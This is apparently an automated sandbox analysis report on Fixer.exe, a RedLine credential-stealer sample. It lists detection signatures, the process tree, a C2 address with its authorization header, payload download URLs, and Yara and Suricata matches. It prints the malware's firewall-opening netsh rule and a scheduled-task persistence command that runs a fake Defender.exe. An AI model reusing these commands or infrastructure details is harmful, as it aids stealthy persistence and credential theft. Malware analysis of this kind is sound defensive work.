Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fixer.exe

Overview

General Information

Sample name:Fixer.exe
Analysis ID:1585853
MD5:2acda1f917022e9e8081ad69b15330c6
SHA1:3bad975d496a0066d64470e4ae1002794581c4f8
SHA256:7bc2586b6d70b12f116dc8f538f58665620a765e2c764a5c143b06ec97bacfc0
Tags:exeRedlineStealeruser-lontze7
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Drops executables to the windows directory (C:\Windows) and starts them
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Fixer.exe (PID: 2520 cmdline: "C:\Users\user\Desktop\Fixer.exe" MD5: 2ACDA1F917022E9E8081AD69B15330C6)
    • 6z9uno0baqvej0me.exe (PID: 528 cmdline: "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe" MD5: 83AB0FD4D723DF8D361E8AE748A01B21)
    • FixerNerest.exe (PID: 5480 cmdline: "C:\Users\user\AppData\Local\Temp\FixerNerest.exe" MD5: 68A9294881810BC2CF709D03D710648D)
      • WmiPrvSE.exe (PID: 3504 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 6208 cmdline: "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6252 cmdline: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 6404 cmdline: schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • Defender.exe (PID: 1684 cmdline: C:\Windows\System32\Defender.exe MD5: 33E16C50B29D01391849E46A442BD547)
    • WerFault.exe (PID: 5352 cmdline: C:\Windows\system32\WerFault.exe -u -p 1684 -s 1244 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • Defender.exe (PID: 4284 cmdline: C:\Windows\System32\Defender.exe MD5: 33E16C50B29D01391849E46A442BD547)
    • WerFault.exe (PID: 6308 cmdline: C:\Windows\system32\WerFault.exe -u -p 4284 -s 1360 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["89.23.97.121:1112"], "Bot Id": "Umbrella", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Fixer.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    Fixer.exeinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
    • 0x24cc3:$gen01: ChromeGetRoamingName
    • 0x24ce8:$gen02: ChromeGetLocalName
    • 0x24d2b:$gen03: get_UserDomainName
    • 0x28bc4:$gen04: get_encrypted_key
    • 0x27943:$gen05: browserPaths
    • 0x27c19:$gen06: GetBrowsers
    • 0x27501:$gen07: get_InstalledInputLanguages
    • 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
    • 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
    • 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
    • 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
    • 0x296c4:$spe9: *wallet*
    • 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
    • 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042
    • 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
    • 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
    • 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
    • 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
    • 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02
    • 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1999968498.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Fixer.exe PID: 2520JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: Fixer.exe PID: 2520JoeSecurity_RedLineYara detected RedLine StealerJoe Security

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.Fixer.exe.fd0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.0.Fixer.exe.fd0000.0.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
                  • 0x24cc3:$gen01: ChromeGetRoamingName
                  • 0x24ce8:$gen02: ChromeGetLocalName
                  • 0x24d2b:$gen03: get_UserDomainName
                  • 0x28bc4:$gen04: get_encrypted_key
                  • 0x27943:$gen05: browserPaths
                  • 0x27c19:$gen06: GetBrowsers
                  • 0x27501:$gen07: get_InstalledInputLanguages
                  • 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
                  • 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
                  • 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
                  • 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
                  • 0x296c4:$spe9: *wallet*
                  • 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
                  • 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042
                  • 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
                  • 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
                  • 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
                  • 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
                  • 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02
                  • 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit, CommandLine: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FixerNerest.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FixerNerest.exe, ParentProcessId: 5480, ParentProcessName: FixerNerest.exe, ProcessCommandLine: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit, ProcessId: 6252, ProcessName: cmd.exe
                  Sigma detected: Invoke-Obfuscation VAR+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit, CommandLine: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FixerNerest.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FixerNerest.exe, ParentProcessId: 5480, ParentProcessName: FixerNerest.exe, ProcessCommandLine: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit, ProcessId: 6252, ProcessName: cmd.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-08T11:14:55.961988+010020432341A Network Trojan was detected89.23.97.1211112192.168.2.549704TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-08T11:14:55.720981+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:01.275839+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:01.687450+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:01.944175+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:02.196357+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:02.989901+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:03.261408+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:03.540404+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:03.783245+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:04.027912+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:04.269642+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:04.542675+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:05.922830+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:06.166587+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:06.551563+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:06.556642+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:07.695845+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:07.939570+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:08.183648+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:08.860818+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:09.369770+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:09.611922+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:09.853674+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:13.309606+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  2025-01-08T11:15:13.571017+010020432311A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-08T11:14:55.720981+010020460451A Network Trojan was detected192.168.2.54970489.23.97.1211112TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-08T11:15:12.809416+010028033053Unknown Traffic192.168.2.54970589.23.97.1211911TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeAvira: detection malicious, Label: HEUR/AGEN.1310090
                  Source: C:\Windows\System32\Defender.exeAvira: detection malicious, Label: TR/Crypt.OPACK.Gen
                  Found malware configuration
                  Source: Fixer.exeMalware Configuration Extractor: RedLine {"C2 url": ["89.23.97.121:1112"], "Bot Id": "Umbrella", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                  Multi AV Scanner detection for submitted file
                  Source: Fixer.exeVirustotal: Detection: 73%Perma Link
                  Source: Fixer.exeReversingLabs: Detection: 68%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: Fixer.exeJoe Sandbox ML: detected
                  Source: Fixer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Fixer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbKo source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbDib source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System32\Defender.PDB source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdbhnh source: Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: C:\Windows\SYSTEM32\DNSAPI.dll.pdb source: Defender.exe, 0000000B.00000002.2591740114.000000001B580000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: q34e089\mscorlib.pdb source: Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: YTR[^f"ghkb.pdb source: Defender.exe, 0000000B.00000002.2591740114.000000001B5CF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: 0C:\Windows\mscorlib.pdb source: Defender.exe, 0000000B.00000002.2592285856.000000001B778000.00000004.00000010.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: C:\Windows\System32\Defender.PDBn7 source: Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb+i source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: Defender.exe, 0000000B.00000002.2591740114.000000001B580000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2761764861.000000001B100000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp, WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.Management.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: mscorlib.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.Management.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.Core.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbsmx source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbpdbHA source: Defender.exe, 0000000B.00000002.2592285856.000000001B778000.00000004.00000010.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: indoC:\Windows\mscorlib.pdb source: Defender.exe, 0000000B.00000002.2592285856.000000001B778000.00000004.00000010.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2762358645.000000001B2F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb 3 source: Defender.exe, 0000000B.00000002.2591740114.000000001B5CF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WEREA25.tmp.dmp.14.dr, WER58DD.tmp.dmp.19.dr

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49704 -> 89.23.97.121:1112
                  Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49704 -> 89.23.97.121:1112
                  Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 89.23.97.121:1112 -> 192.168.2.5:49704
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 89.23.97.121:1112
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 1911
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1911 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 1911
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1911 -> 49705
                  Source: global trafficTCP traffic: 192.168.2.5:49704 -> 89.23.97.121:1112
                  Source: global trafficTCP traffic: 192.168.2.5:49832 -> 147.185.221.24:61069
                  Source: global trafficHTTP traffic detected: GET /6z9uno0baqvej0me.exe HTTP/1.1Host: 89.23.97.121:1911Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /FixerNerest.exe HTTP/1.1Host: 89.23.97.121:1911
                  Source: Joe Sandbox ViewIP Address: 147.185.221.24 147.185.221.24
                  Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 89.23.97.121:1911
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                  Source: global trafficHTTP traffic detected: GET /6z9uno0baqvej0me.exe HTTP/1.1Host: 89.23.97.121:1911Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /FixerNerest.exe HTTP/1.1Host: 89.23.97.121:1911
                  Source: global trafficDNS traffic detected: DNS query: et-seattle.gl.at.ply.gg
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000360E000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003604000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.121:1911
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003604000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.121:1911/6z9uno0baqvej0me.exe
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.121:1911/FixerNerest.exe
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
